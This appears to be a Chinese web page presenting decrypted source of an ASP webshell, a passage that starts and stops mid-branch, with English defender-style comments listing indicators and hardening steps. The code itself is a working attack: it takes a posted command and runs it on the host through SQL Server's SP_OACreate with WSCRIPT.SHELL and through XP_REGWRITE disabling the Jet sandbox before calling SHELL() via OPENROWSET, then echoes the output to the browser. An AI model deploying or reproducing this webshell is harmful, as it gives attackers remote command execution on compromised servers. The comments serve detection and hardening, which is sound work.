asp木马代码解密的随机加密webshell

2019-04-01 16:06:22 王冬梅

SET RECRESULT = NOTHING
RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
RESPONSE.WRITE "利用"&REQUEST("TOOL")&"扩展执行"
RESPONSE.WRITE REQUEST.FORM("CMD")
RESPONSE.WRITE STRRESULT
RESPONSE.WRITE "</TEXTAREA>"
END IF

' ---------------------------------------------------------------------------
' Branch taken when the TOOL request parameter equals "SP_OACreate".
' Defender summary: this web-shell handler turns a SQL Server login into
' operating-system command execution through the OLE Automation procedures
' (SP_OACreate / SP_OAMETHOD) and sends the command output back to the browser.
' Indicators visible in this block: a table named [JNC], a temp file 8617.TMP,
' WSCRIPT.SHELL instantiated from T-SQL, and "CMD /C" started by the database
' engine.
' Hardening: keep the 'Ole Automation Procedures' server option disabled, do
' not let web-facing logins hold sysadmin, and run the SQL Server service
' under a low-privilege account.
' ---------------------------------------------------------------------------
ELSEIF REQUEST("TOOL")="SP_OACreate" THEN
' Connection target and credentials come from session values (SERVER, PORT,
' PASS, NAME); where they are set is not visible in this part of the page.
SET ADOCONN=SERVER.CreateOBJECT("ADODB.CONNECTION")
ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
' Nothing below runs unless the posted form field CMD is non-empty.
IF REQUEST.FORM("CMD")<>"" THEN
' A single batch: create the staging table, run the request-supplied command
' through WSCRIPT.SHELL with its output redirected to 8617.TMP, then BULK
' INSERT that file into the table. The request value is concatenated into the
' T-SQL text with no escaping. Note the guard above tests REQUEST.FORM while
' this line reads the generic REQUEST collection.
STRQUERY = "Create TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);USE MASTER DECLARE @O INT EXEC SP_OACreate 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C "&REQUEST("CMD")&" > 8617.TMP',0,TRUE;BULK Insert [JNC] FROM '8617.TMP' WITH (KEEPNULLS);"
ADOCONN.EXECUTE(STRQUERY)
' Read the captured output back: the first column of every row, joined with CR.
STRQUERY = "Select * FROM JNC"
SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
IF NOT RECRESULT.EOF THEN
DO WHILE NOT RECRESULT.EOF
STRRESULT = STRRESULT & CHR(13) & RECRESULT(0)
RECRESULT.MOVENEXT
LOOP
END IF
SET RECRESULT = NOTHING
' The request values and the collected output are written into the page
' without HTML encoding.
RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
RESPONSE.WRITE "利用"&REQUEST("TOOL")&"扩展执行"
RESPONSE.WRITE REQUEST.FORM("CMD")
RESPONSE.WRITE STRRESULT
RESPONSE.WRITE "</TEXTAREA>"
' Clean-up: the staging table is dropped and the temp file deleted in the same
' request, so both artefacts are short-lived. Detection should rely on SQL
' auditing and process-creation logging rather than on finding the file or
' the table afterwards.
STRQUERY = "Drop TABLE [JNC];DECLARE @O INT EXEC SP_OACreate 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C DEL 8617.TMP'"
ADOCONN.EXECUTE(STRQUERY)
END IF

' ---------------------------------------------------------------------------
' Branch taken when the TOOL request parameter equals "XP_REGWRITE".
' Defender summary: the handler uses the XP_REGWRITE extended procedure to set
' the Jet 4.0 SANDBOXMODE registry value to 0, then evaluates SHELL(...) inside
' a Jet query reached through OPENROWSET, which runs an OS command from the
' database engine. The visible lines never restore the registry value, so the
' change outlives the request and is a durable indicator.
' Other indicators visible here: OPENROWSET with MICROSOFT.JET.OLEDB.4.0
' against IAS.MDB, the temp files 8617.TMP and JNC.TMP, and a table [JNC].
' Hardening: keep 'Ad Hoc Distributed Queries' disabled, restrict EXECUTE on
' XP_REGWRITE, do not let web-facing logins hold sysadmin, and monitor the
' SANDBOXMODE value for changes.
' NOTE(review): the file-path and registry-key strings on this page contain no
' backslashes; they were probably stripped when the page was extracted, so do
' not reuse the strings as shown for exact-match signatures.
' This branch continues past the last visible line (the IF opened on CMD below
' is not closed within this excerpt).
' ---------------------------------------------------------------------------
ELSEIF REQUEST("TOOL")="XP_REGWRITE" THEN
' Choose the location of IAS.MDB from the session value SYSTEM; "2000"
' presumably means Windows 2000 (WINNT directory) - confirm against the part
' of the script that sets it.
IF SESSION("SYSTEM")="2000" THEN
PATH="C:WINNTSYSTEM32IASIAS.MDB"
ELSE
PATH="C:WINDOWSSYSTEM32IASIAS.MDB"
END IF
' Connection target and credentials come from session values (SERVER, PORT,
' PASS, NAME); where they are set is not visible in this part of the page.
SET ADOCONN=SERVER.CreateOBJECT("ADODB.CONNECTION")
ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
' Nothing below runs unless the posted form field CMD is non-empty.
IF REQUEST.FORM("CMD")<>"" THEN
' The posted value is wrapped in double quotes (CHR(34)) and given a redirect
' to 8617.TMP; it is inserted into the query text with no escaping.
CMD=CHR(34)&"CMD.EXE /C "&REQUEST.FORM("CMD")&" > 8617.TMP"&CHR(34)
' One batch: create the staging table, write SANDBOXMODE = 0 (REG_DWORD) under
' HKEY_LOCAL_MACHINE, then run a Jet query whose select list is SHELL(CMD).
STRQUERY = "Create TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);EXEC MASTER..XP_REGWRITE 'HKEY_LOCAL_MACHINE','SOFTWAREMICROSOFTJET4.0ENGINES','SANDBOXMODE','REG_DWORD',0;Select * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','Select SHELL("&CMD&")');"
ADOCONN.EXECUTE(STRQUERY)
' Second Jet SHELL call copies the output to JNC.TMP, which is then loaded
' into the staging table with BULK INSERT.
STRQUERY = "Select * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','Select SHELL("&CHR(34)&"CMD.EXE /C COPY 8617.TMP JNC.TMP"&CHR(34)&")');BULK Insert [JNC] FROM 'JNC.TMP' WITH (KEEPNULLS);"
' This recordset is replaced by the next EXECUTE before it is read.
SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
' Read the captured output back: the first column of every row, joined with CR.
STRQUERY="Select * FROM [JNC];"
SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
IF NOT RECRESULT.EOF THEN
DO WHILE NOT RECRESULT.EOF
STRRESULT = STRRESULT & CHR(13) & RECRESULT(0)
RECRESULT.MOVENEXT
LOOP
END IF
SET RECRESULT = NOTHING
' The request values and the collected output are written into the page
' without HTML encoding.
RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
RESPONSE.WRITE "利用"&REQUEST("TOOL")&"扩展执行"
RESPONSE.WRITE REQUEST.FORM("CMD")
RESPONSE.WRITE STRRESULT
RESPONSE.WRITE "</TEXTAREA>"